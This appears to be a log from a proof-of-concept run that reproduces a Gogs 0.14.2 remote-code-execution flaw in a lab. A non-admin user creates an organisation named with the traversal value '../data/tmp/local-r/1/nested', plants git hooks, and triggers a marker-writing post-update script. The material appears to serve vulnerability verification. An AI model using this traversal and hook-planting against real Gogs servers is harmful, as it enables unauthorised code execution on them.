variant=nonadmin_org_create role=vuln version=Gogs version 0.14.2 nonadmin_user=vv-vuln-22080-30425 is_admin=0 writer_id=1 evil=../data/tmp/local-r/1/nested org_create_endpoint=POST /api/v1/user/orgs (CreateMyOrg, NON-ADMIN) org_create_status=201 repo_create_status=201 nested_repo_exists=yes (outside /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/repositories) hook_planted=yes rce_triggered=yes marker=/workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/vuln_variant/rce_marker_vuln.txt marker_exists=yes --- localcopy tree --- /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/dummy2.txt /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/ORIG_HEAD /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/config /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-merge-commit.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/push-to-checkout.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-receive.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/fsmonitor-watchman.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/post-update.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/prepare-commit-msg.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-rebase.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/sendemail-validate.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-applypatch.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/update.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-push.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/commit-msg.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/applypatch-msg.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/hooks/pre-commit.sample /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/packed-refs /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/description /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/info/exclude /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/d2/a90383d1c88c06247bdb155850c44f79a5ac97 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/1e/1445ad34e96cff5088cfce4dcb95b82cbe33b0 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/1e/be0922628661982258fcb17aca1a9bd42eb89c /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/ab/6322f9f0e83806a615be0e288158f7ec2d84a0 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/6c/bef5c370d8c3486ca85423dd70440c5e0a2aa2 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/e9/b0a4e8a06f460e6d7a3774192b11f49cc43a5e /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/e9/7a082a41c36b5186bd196898961648cb46d762 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/41/42082bcb939bbc17985a69ba748491ac6b62a5 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/42/9e0a51c12efcc3dd2cdad7e7fc1ec971c9b739 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/bb/f87a1eea863daa5fddefe269148b969f9e12e2 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/95/0a9344a9e89cd2c0eceb7850b28e054d4168ac /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/97/5d4034a8ee936059184be74941bb751dc90cfb /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/8b/137891791fe96927ad78e64b0aad7bded08bdc /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/af/5a0c0018b5e9c04b56ac52f21b4d28f48d99ea /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/ec/17ec1939b7c3e86b7cb6c0c4de6b0818a7e75e /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/a5/196d1be8fb59edf8062bef36d3a602e0812139 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/a5/d7b84a673458d14d9aab082183a1968c2c7492 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/39/9eab1924e39da570b389b0bef1ca713b3b05c3 /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/13/fada9072f13929c6ee1652cb2b98ec27542e3b /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/.git/objects/71/676cd9c0f40d4bb259c9c96c269413e13e0092 --- nested hooks --- total 88 drwxr-xr-x 2 vscode vscode 4096 Jul 1 14:34 . drwxr-xr-x 6 vscode vscode 4096 Jul 1 14:34 .. -rwxr-xr-x 1 vscode vscode 478 Jul 1 14:34 applypatch-msg.sample -rwxr-xr-x 1 vscode vscode 1972 Jul 1 14:34 commit-msg.sample -rwxr-xr-x 1 vscode vscode 4611 Jul 1 14:34 fsmonitor-watchman.sample -rwxr-xr-x 1 vscode vscode 263 Jul 1 14:34 post-receive -rwxr-xr-x 1 vscode vscode 268 Jul 1 14:34 post-update -rwxr-xr-x 1 vscode vscode 189 Jul 1 14:34 post-update.sample -rwxr-xr-x 1 vscode vscode 424 Jul 1 14:34 pre-applypatch.sample -rwxr-xr-x 1 vscode vscode 1649 Jul 1 14:34 pre-commit.sample -rwxr-xr-x 1 vscode vscode 416 Jul 1 14:34 pre-merge-commit.sample -rwxr-xr-x 1 vscode vscode 1374 Jul 1 14:34 pre-push.sample -rwxr-xr-x 1 vscode vscode 4898 Jul 1 14:34 pre-rebase.sample -rwxr-xr-x 1 vscode vscode 262 Jul 1 14:34 pre-receive -rwxr-xr-x 1 vscode vscode 544 Jul 1 14:34 pre-receive.sample -rwxr-xr-x 1 vscode vscode 1492 Jul 1 14:34 prepare-commit-msg.sample -rwxr-xr-x 1 vscode vscode 2783 Jul 1 14:34 push-to-checkout.sample -rwxr-xr-x 1 vscode vscode 2308 Jul 1 14:34 sendemail-validate.sample -rwxr-xr-x 1 vscode vscode 266 Jul 1 14:34 update -rwxr-xr-x 1 vscode vscode 3650 Jul 1 14:34 update.sample --- post-update --- #!/bin/sh { echo PRUVA_GOGS_RCE_EXECUTED echo "variant=nonadmin role=vuln" echo "user=$(id -un) uid=$(id -u) gid=$(id -g)" echo "cwd=$(pwd)" date -u } > /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/vuln_variant/rce_marker_vuln.txt exit 0 --- marker --- PRUVA_GOGS_RCE_EXECUTED variant=nonadmin role=vuln user=vscode uid=1000 gid=1000 cwd=/workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/nested/rce.git Wed Jul 1 14:34:42 UTC 2026 --- git log tail --- Fast-forward dummy1.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 dummy1.txt To http://127.0.0.1:33191/vv-vuln-22080-30425/writer.git ab6322f..fe7ac16 HEAD -> master To /workspace/artifacts/8363606b-ffb6-4671-bf5d-9a7a6060953e/bundle/artifacts/gogs-cve-2026-52813/vv-run-vuln/data/tmp/local-r/1/nested/rce.git * [new branch] HEAD -> master